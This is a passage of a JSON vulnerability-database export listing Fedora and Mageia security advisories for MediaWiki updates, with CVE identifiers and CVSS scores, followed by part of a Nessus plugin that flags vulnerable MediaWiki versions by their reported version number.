{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7199"], "modified": "2014-10-06T05:04:38", "id": "FEDORA:EF92821EA9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/UM7Z5EHM5KGJMMKUYLYV6ZP4TS4R7RPB/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-10-06T05:05:28", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.4-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7199"], "modified": "2014-10-06T05:05:28", "id": "FEDORA:CAA3F21DF3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XL6BJ5BHOVLRS2V6PMNJJSA55IDTCMIY/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-10-14T04:36:28", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.5-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-10-14T04:36:28", "id": "FEDORA:68E1360D7018", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3WTETZPYZYGTJ5BI2QJEMI7RNSVZA3RW/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.5/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-10-14T04:43:12", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.5-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-10-14T04:43:12", "id": "FEDORA:9392B60CA53E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VX3N3TV7ROUT3YQ62CD7EO46YFUZLHE3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.7/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-12-12T04:24:17", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.7-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-12-12T04:24:17", "id": "FEDORA:03ECD60DC901", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VNNLIAWGBQXFJM7YREYTBNEJIN7RZBAW/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-12-12T04:34:24", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.7-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-12-12T04:34:24", "id": "FEDORA:99FA160CBEF5", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/TRZKJ2MNN7ITVS6YOYNYZM7TS6Q653ZP/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-12-29T10:04:19", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.8-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-12-29T10:04:19", "id": "FEDORA:D3C0160CE2C3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KC4MGP4QEGIANCRADSBQ4LY7MG22PCVJ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.8/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-12-29T10:05:00", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.8-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2014-12-29T10:05:00", "id": "FEDORA:BFF2560CE4A3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XNS5HBACEMJWO7JQTOEQIHNQKPLRPVS4/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2015-04-18T09:37:06", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.9-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-7295"], "modified": "2015-04-18T09:37:06", "id": "FEDORA:312EC6016164", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3HK6NB3ACCBLDBEOOAR5ENSEYY6NWCOZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-04-09T01:00:28", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.8-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2014-04-09T01:00:28", "id": "FEDORA:380E022043", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZQHCO7LGH4NKT542RRZ6KJHLSSO6XVFV/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.8/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-04-09T01:03:53", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.8-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2665"], "modified": "2014-04-09T01:03:53", "id": "FEDORA:A746520CC1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/UBLZFLUP2GS36GQCC47I4BMULVM3PNK4/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.6/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-03-11T04:08:52", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.6-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244"], "modified": "2014-03-11T04:08:52", "id": "FEDORA:1D19E21D3E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JEOLZGYOL3LTXU6PTPLS743VOQ3GPBQF/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-03-11T04:15:05", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.6-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244"], "modified": "2014-03-11T04:15:05", "id": "FEDORA:23311215C1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QFOYRM5ODOUQDJCBDPIEIHV6VAF5MONB/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "MediaWiki user Michael M reported that the fix for CVE-2013-4568 allowed insertion of escaped CSS values which could pass the CSS validation checks, resulting in XSS (CVE-2013-6451). Chris from RationalWiki reported that SVG files could be uploaded that include external stylesheets, which could lead to XSS when an XSL was used to include JavaScript (CVE-2013-6452). During internal review, it was discovered that MediaWiki's SVG sanitization could be bypassed when the XML was considered invalid (CVE-2013-6453). During internal review, it was discovered that MediaWiki displayed some information about deleted pages in the log API, enhanced RecentChanges, and user watchlists (CVE-2013-6472). Netanel Rubin from Check Point discovered a remote code execution vulnerability in MediaWiki's thumbnail generation for DjVu files. Internal review also discovered similar logic in the PdfHandler extension, which could be exploited in a similar way (CVE-2014-1610). MediaWiki has been updated to version 1.22.2, which fixes these issues, as well as several others. Also, the mediawiki-ldapauthentication and mediawiki-math extensions have been updated to newer versions that are compatible with MediaWiki 1.22. Additionally, the mediawiki-graphviz extension has been obsoleted, due to the fact that it is unmaintained upstream and is vulnerable to cross-site scripting attacks. Note: if you were using the \"instances\" feature in these packages to support multiple wiki instances, this feature has now been removed. You will need to maintain separate wiki instances manually. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2014-03-02T20:53:30", "type": "mageia", "title": "Updated mediawiki packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4568", "CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-03-02T20:53:30", "id": "MGASA-2014-0113", "href": "https://advisories.mageia.org/MGASA-2014-0113.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "MediaWiki before 1.23.2 is vulnerable to JSONP injection in Flash (CVE-2014-5241), XSS in mediawiki.page.image.pagination.js (CVE-2014-5242), and clickjacking between OutputPage and ParserOutput (CVE-2014-5243). This update provides MediaWiki 1.23.2, fixing these and other issues. \n", "cvss3": {}, "published": "2014-08-05T20:08:48", "type": "mageia", "title": "Updated mediawiki packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2014-08-05T20:08:48", "id": "MGASA-2014-0309", "href": "https://advisories.mageia.org/MGASA-2014-0309.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated mediawiki packages fix security vulnerability: XSS vulnerability in MediaWiki before 1.22.6, where if the default sort key is set to a string containing a script, the script will be executed when the page is viewed using the info action (CVE-2014-2853). \n", "cvss3": {}, "published": "2014-04-28T18:16:23", "type": "mageia", "title": "Updated mediawiki packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2014-04-28T18:16:23", "id": "MGASA-2014-0197", "href": "https://advisories.mageia.org/MGASA-2014-0197.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2022-04-16T14:08:33", "description": "According to its version number, the instance of MediaWiki running on the remote host is affected by the following vulnerabilities :\n\n - A flaw exists due to comments not being prepended to the JSONP callbacks. This allows a remote attacker, using a specially crafted SWF file, to perform a cross-site request forgery attack. (CVE-2014-5241)\n\n - A cross-site scripting vulnerability exists within the 'mediawiki.page.image.pagination.js' script due to a failure to validate user-supplied input when the function 'ajaxifyPageNavigation' calls 'loadPage'. This allows a remote attacker, using a specially crafted request, to execute arbitrary script code within the trust relationship between the browser and server.\n (CVE-2014-5242)\n\n - A flaw exists with the iFrame protection mechanism, related to 'OutputPage' and 'ParserOutput', which allows a remote attacker to conduct a clickjacking attack.\n (CVE-2014-5243)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-13T00:00:00", "type": "nessus", "title": "MediaWiki < 1.19.18 / 1.22.9 / 1.23.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_23_2.NASL", "href": "https://www.tenable.com/plugins/nessus/77183", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77183);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\");\n script_bugtraq_id(69135, 69136, 69137);\n\n script_name(english:\"MediaWiki < 1.19.18 / 1.22.9 / 1.23.2 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running on\nthe remote host is affected by the following vulnerabilities :\n\n - A flaw exists due to comments not being prepended to the\n JSONP callbacks. This allows a remote attacker, using a\n specially crafted SWF file, to perform a cross-site\n request forgery attack. (CVE-2014-5241)\n\n - A cross-site scripting vulnerability exists within the\n 'mediawiki.page.image.pagination.js' script due to a\n failure to validate user-supplied input when the\n function 'ajaxifyPageNavigation' calls 'loadPage'. This\n allows a remote attacker, using a specially crafted\n request, to execute arbitrary script code within the\n trust relationship between the browser and server.\n (CVE-2014-5242)\n\n - A flaw exists with the iFrame protection mechanism,\n related to 'OutputPage' and 'ParserOutput', which allows\n a remote attacker to conduct a clickjacking attack.\n (CVE-2014-5243)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-July/000157.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ee4304d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19#MediaWiki_1.19.18\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22#MediaWiki_1.22.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.23#MediaWiki_1.23.2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://phabricator.wikimedia.org/T70187\");\n script_set_attribute(attribute:\"see_also\", value:\"https://phabricator.wikimedia.org/T68608\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.18 / 1.22.9 / 1.23.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/13\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.19\\.(\\d|1[0-7])([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[0-8]([^0-9]|$)\" ||\n version =~ \"^1\\.23\\.[01]([^0-9]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n 